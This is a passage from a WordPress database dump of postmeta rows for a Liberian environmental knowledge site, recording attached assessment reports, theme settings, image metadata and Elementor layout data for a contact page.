Jallah'),(22571,3275,'year','2020'),(22577,3275,'_dp_original','3273'),(22578,3275,'_edit_lock','1670325091:42'),(22579,3275,'_edit_last','42'),(22580,3276,'_wp_attached_file','2020/12/UNCCD-INTRO_CCCD_BUCHANAN_26112020.pdf'),(22581,3269,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724537;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1780;}i:1;a:1:{s:2:\"id\";i:3257;}i:2;a:1:{s:2:\"id\";i:3245;}}}}'),(22582,3267,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627243642;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2751;}i:1;a:1:{s:2:\"id\";i:3109;}i:2;a:1:{s:2:\"id\";i:2161;}}}}'),(22583,3273,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724570;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3278;}i:1;a:1:{s:2:\"id\";i:3282;}i:2;a:1:{s:2:\"id\";i:3280;}}}}'),(22584,3265,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628691331;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3245;}i:1;a:1:{s:2:\"id\";i:3240;}i:2;a:1:{s:2:\"id\";i:3253;}}}}'),(22585,3263,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628159504;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2063;}i:1;a:1:{s:2:\"id\";i:3253;}i:2;a:1:{s:2:\"id\";i:2161;}}}}'),(22591,3275,'_last_editor_used_jetpack','classic-editor'),(22593,3275,'_pods_attached_document','a:1:{i:0;i:3276;}'),(22596,3275,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629047755;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:1778;}}}}'),(22622,3278,'_last_editor_used_jetpack','classic-editor'),(22623,3278,'_edit_lock','1670886163:42'),(22624,3278,'_edit_last','42'),(22625,3279,'_wp_attached_file','2020/12/tna-report-coastal-zone-liberia.pdf'),(22626,3245,'_last_editor_used_jetpack','classic-editor'),(22627,3278,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/tna-report-coastal-zone-liberia.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22628,3278,'by','E.Tenesee Wilson'),(22629,3278,'year','2019'),(22632,3278,'_pods_attached_document','a:1:{i:0;i:3279;}'),(22634,3278,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724479;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2993;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:3273;}}}}'),(22637,3280,'_last_editor_used_jetpack','classic-editor'),(22638,3280,'_edit_lock','1670425092:42'),(22639,3280,'_edit_last','42'),(22640,3281,'_wp_attached_file','2020/12/liberia-technology-needs-assessment-for-the-energy-sector.pdf'),(22641,3280,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/liberia-technology-needs-assessment-for-the-energy-sector.pdf'),(22642,3280,'by','Dr. Allison Felix Hughes, Mr. Christopher B. Kabah, Dr. Sara Lærke Meltofte Trærup, & Dr. Debbie Sparks'),(22643,3280,'year','2019'),(22646,3280,'_pods_attached_document','a:1:{i:0;i:3281;}'),(22648,3282,'_last_editor_used_jetpack','classic-editor'),(22649,3282,'_edit_lock','1670425143:42'),(22650,3282,'_edit_last','42'),(22651,3283,'_wp_attached_file','2020/12/tna-agriculture-report-liberia.pdf'),(22652,3282,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/tna-agriculture-report-liberia.pdf'),(22653,3282,'by','John F. Kannah'),(22654,3282,'year','2019'),(22657,3282,'_pods_attached_document','a:1:{i:0;i:3283;}'),(22660,3285,'_last_editor_used_jetpack','classic-editor'),(22661,3285,'_edit_lock','1670425198:42'),(22662,3285,'_edit_last','42'),(22663,3286,'_wp_attached_file','2020/12/liberia-coastal-zone-baef-report.pdf'),(22664,3285,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/liberia-coastal-zone-baef-report.pdf'),(22665,3285,'by','E.Tenesee Wilson'),(22666,3285,'year','2020'),(22669,3285,'_pods_attached_document','a:1:{i:0;i:3286;}'),(22671,3287,'_last_editor_used_jetpack','classic-editor'),(22672,3287,'_edit_lock','1670352970:42'),(22673,3287,'_edit_last','38'),(22674,3288,'_wp_attached_file','2020/12/tna-agriculture-baef-report-liberia.pdf'),(22675,3287,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/tna-agriculture-baef-report-liberia.pdf'),(22676,3287,'by','John F. Kannah'),(22677,3287,'year','2020'),(22680,3287,'_pods_attached_document','a:1:{i:0;i:3288;}'),(22682,3287,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628843056;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3285;}i:1;a:1:{s:2:\"id\";i:3282;}i:2;a:1:{s:2:\"id\";i:3099;}}}}'),(22683,3280,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724471;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:3273;}i:2;a:1:{s:2:\"id\";i:3282;}}}}'),(22684,3285,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628843255;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3287;}i:1;a:1:{s:2:\"id\";i:3282;}i:2;a:1:{s:2:\"id\";i:3099;}}}}'),(22685,3282,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628928566;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:2993;}i:2;a:1:{s:2:\"id\";i:2991;}}}}'),(22694,3290,'ocean_gallery_link_images','off'),(22695,3290,'ocean_sidebar','0'),(22696,3290,'ocean_second_sidebar','0'),(22697,3290,'ocean_disable_margins','enable'),(22698,3290,'ocean_display_top_bar','default'),(22699,3290,'ocean_display_header','default'),(22700,3290,'ocean_center_header_left_menu','0'),(22701,3290,'ocean_custom_header_template','0'),(22702,3290,'ocean_header_custom_menu','0'),(22703,3290,'ocean_menu_typo_font_family','0'),(22704,3290,'ocean_disable_title','default'),(22705,3290,'ocean_disable_heading','default'),(22706,3290,'ocean_disable_breadcrumbs','default'),(22707,3290,'ocean_display_footer_widgets','default'),(22708,3290,'ocean_display_footer_bottom','default'),(22709,3290,'ocean_custom_footer_template','0'),(22710,3290,'ocean_link_format_target','self'),(22711,3290,'ocean_quote_format_link','post'),(22712,3290,'osh_disable_topbar_sticky','default'),(22713,3290,'osh_disable_header_sticky','default'),(22714,3290,'osh_sticky_header_style','default'),(22715,3290,'_thumbnail_id','3295'),(22716,3290,'_elementor_controls_usage','a:0:{}'),(22717,3290,'_dp_original','3127'),(22718,3290,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627904358;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3771;}i:1;a:1:{s:2:\"id\";i:2804;}i:2;a:1:{s:2:\"id\";i:2956;}}}}'),(22719,3290,'_edit_lock','1609930298:42'),(22720,3290,'_last_editor_used_jetpack','block-editor'),(22756,91,'_last_editor_used_jetpack','block-editor'),(22799,3295,'_wp_attached_file','2021/01/131987691_726085294699920_4200638508675567507_o-e1609930382866.jpg'),(22800,3295,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:541;s:6:\"height\";i:488;s:4:\"file\";s:74:\"2021/01/131987691_726085294699920_4200638508675567507_o-e1609930382866.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:74:\"131987691_726085294699920_4200638508675567507_o-e1609930382866-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"131987691_726085294699920_4200638508675567507_o-473x1024.jpg\";s:5:\"width\";i:473;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:74:\"131987691_726085294699920_4200638508675567507_o-e1609930382866-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22801,3290,'_edit_last','42'),(22804,3295,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:540;s:6:\"height\";i:1170;s:4:\"file\";s:51:\"131987691_726085294699920_4200638508675567507_o.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:59:\"131987691_726085294699920_4200638508675567507_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:59:\"131987691_726085294699920_4200638508675567507_o-138x300.jpg\";s:5:\"width\";i:138;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:60:\"131987691_726085294699920_4200638508675567507_o-473x1024.jpg\";s:5:\"width\";i:473;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(22807,3297,'ocean_gallery_link_images','off'),(22808,3297,'ocean_sidebar','0'),(22809,3297,'ocean_second_sidebar','0'),(22810,3297,'ocean_disable_margins','enable'),(22811,3297,'ocean_display_top_bar','default'),(22812,3297,'ocean_display_header','default'),(22813,3297,'ocean_center_header_left_menu','0'),(22814,3297,'ocean_custom_header_template','0'),(22815,3297,'ocean_header_custom_menu','0'),(22816,3297,'ocean_menu_typo_font_family','0'),(22817,3297,'ocean_disable_title','default'),(22818,3297,'ocean_disable_heading','default'),(22819,3297,'ocean_disable_breadcrumbs','default'),(22820,3297,'ocean_display_footer_widgets','default'),(22821,3297,'ocean_display_footer_bottom','default'),(22822,3297,'ocean_custom_footer_template','0'),(22823,3297,'ocean_link_format_target','self'),(22824,3297,'ocean_quote_format_link','post'),(22825,3297,'osh_disable_topbar_sticky','default'),(22826,3297,'osh_disable_header_sticky','default'),(22827,3297,'osh_sticky_header_style','default'),(22828,3297,'_thumbnail_id','3298'),(22829,3297,'_elementor_controls_usage','a:0:{}'),(22830,3297,'_dp_original','3127'),(22831,3297,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628319254;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3038;}i:1;a:1:{s:2:\"id\";i:3430;}i:2;a:1:{s:2:\"id\";i:2956;}}}}'),(22832,3297,'_edit_lock','1609930631:42'),(22833,3297,'_last_editor_used_jetpack','block-editor'),(22834,3298,'_wp_attached_file','2021/01/epa-mee-e1609930686583.jpg'),(22835,3298,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1228;s:6:\"height\";i:560;s:4:\"file\";s:34:\"2021/01/epa-mee-e1609930686583.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"epa-mee-e1609930686583-300x137.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"epa-mee-e1609930686583-1024x467.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"epa-mee-e1609930686583-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"epa-mee-e1609930686583-768x350.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22836,3298,'_wp_attachment_backup_sizes','a:5:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1280;s:6:\"height\";i:561;s:4:\"file\";s:11:\"epa-mee.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"epa-mee-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:19:\"epa-mee-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:19:\"epa-mee-768x337.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:20:\"epa-mee-1024x449.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(22839,3297,'_edit_last','42'),(22872,3307,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103664;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3721;}i:1;a:1:{s:2:\"id\";i:3297;}i:2;a:1:{s:2:\"id\";i:3313;}i:3;a:1:{s:2:\"id\";i:3430;}i:4;a:1:{s:2:\"id\";i:3069;}i:5;a:1:{s:2:\"id\";i:3117;}}}}'),(22873,3307,'_edit_lock','1610538458:42'),(22874,3307,'_last_editor_used_jetpack','block-editor'),(22877,3309,'_wp_attached_file','2021/01/eco-project.jpg'),(22878,3309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:23:\"2021/01/eco-project.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"eco-project-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"eco-project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"eco-project-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22879,3309,'_wp_attachment_image_alt','Miss Earth Liberia and some students'),(22882,3307,'_thumbnail_id','3309'),(22883,3307,'_edit_last','42'),(22884,3307,'ocean_gallery_link_images','off'),(22885,3307,'ocean_sidebar','0'),(22886,3307,'ocean_second_sidebar','0'),(22887,3307,'ocean_disable_margins','enable'),(22888,3307,'ocean_display_top_bar','default'),(22889,3307,'ocean_display_header','default'),(22890,3307,'ocean_center_header_left_menu','0'),(22891,3307,'ocean_custom_header_template','0'),(22892,3307,'ocean_header_custom_menu','0'),(22893,3307,'ocean_menu_typo_font_family','0'),(22894,3307,'ocean_disable_title','default'),(22895,3307,'ocean_disable_heading','default'),(22896,3307,'ocean_disable_breadcrumbs','default'),(22897,3307,'ocean_display_footer_widgets','default'),(22898,3307,'ocean_display_footer_bottom','default'),(22899,3307,'ocean_custom_footer_template','0'),(22900,3307,'ocean_link_format_target','self'),(22901,3307,'ocean_quote_format_link','post'),(22902,3307,'osh_disable_topbar_sticky','default'),(22903,3307,'osh_disable_header_sticky','default'),(22904,3307,'osh_sticky_header_style','default'),(22943,3051,'_last_editor_used_jetpack','classic-editor'),(22944,3313,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628604890;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3023;}i:1;a:1:{s:2:\"id\";i:3486;}i:2;a:1:{s:2:\"id\";i:3045;}}}}'),(22945,3313,'_edit_lock','1610708901:42'),(22946,3313,'_last_editor_used_jetpack','block-editor'),(22947,3314,'_wp_attached_file','2021/01/news.jpg'),(22948,3314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2021/01/news.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"news-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"news-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22951,3313,'_thumbnail_id','3314'),(22952,3313,'_edit_last','42'),(22953,3313,'ocean_gallery_link_images','off'),(22954,3313,'ocean_sidebar','0'),(22955,3313,'ocean_second_sidebar','0'),(22956,3313,'ocean_disable_margins','enable'),(22957,3313,'ocean_display_top_bar','default'),(22958,3313,'ocean_display_header','default'),(22959,3313,'ocean_center_header_left_menu','0'),(22960,3313,'ocean_custom_header_template','0'),(22961,3313,'ocean_header_custom_menu','0'),(22962,3313,'ocean_menu_typo_font_family','0'),(22963,3313,'ocean_disable_title','default'),(22964,3313,'ocean_disable_heading','default'),(22965,3313,'ocean_disable_breadcrumbs','default'),(22966,3313,'ocean_display_footer_widgets','default'),(22967,3313,'ocean_display_footer_bottom','default'),(22968,3313,'ocean_custom_footer_template','0'),(22969,3313,'ocean_link_format_target','self'),(22970,3313,'ocean_quote_format_link','post'),(22971,3313,'osh_disable_topbar_sticky','default'),(22972,3313,'osh_disable_header_sticky','default'),(22973,3313,'osh_sticky_header_style','default'),(22974,3316,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627492340;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3721;}i:1;a:1:{s:2:\"id\";i:3063;}i:2;a:1:{s:2:\"id\";i:2801;}}}}'),(22975,3316,'_edit_lock','1610723443:42'),(22976,3316,'_last_editor_used_jetpack','block-editor'),(22977,3317,'_wp_attached_file','2021/01/nap.jpg'),(22978,3317,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/01/nap.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"nap-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"nap-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"nap-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22981,3316,'_thumbnail_id','3317'),(22982,3316,'_edit_last','42'),(22983,3316,'ocean_gallery_link_images','off'),(22984,3316,'ocean_sidebar','0'),(22985,3316,'ocean_second_sidebar','0'),(22986,3316,'ocean_disable_margins','enable'),(22987,3316,'ocean_display_top_bar','default'),(22988,3316,'ocean_display_header','default'),(22989,3316,'ocean_center_header_left_menu','0'),(22990,3316,'ocean_custom_header_template','0'),(22991,3316,'ocean_header_custom_menu','0'),(22992,3316,'ocean_menu_typo_font_family','0'),(22993,3316,'ocean_disable_title','default'),(22994,3316,'ocean_disable_heading','default'),(22995,3316,'ocean_disable_breadcrumbs','default'),(22996,3316,'ocean_display_footer_widgets','default'),(22997,3316,'ocean_display_footer_bottom','default'),(22998,3316,'ocean_custom_footer_template','0'),(22999,3316,'ocean_link_format_target','self'),(23000,3316,'ocean_quote_format_link','post'),(23001,3316,'osh_disable_topbar_sticky','default'),(23002,3316,'osh_disable_header_sticky','default'),(23003,3316,'osh_sticky_header_style','default'),(23011,3320,'_elementor_edit_mode','builder'),(23012,3320,'_elementor_template_type','wp-page'),(23013,3320,'_elementor_version','3.0.12'),(23014,3320,'_wp_page_template','default'),(23015,3320,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":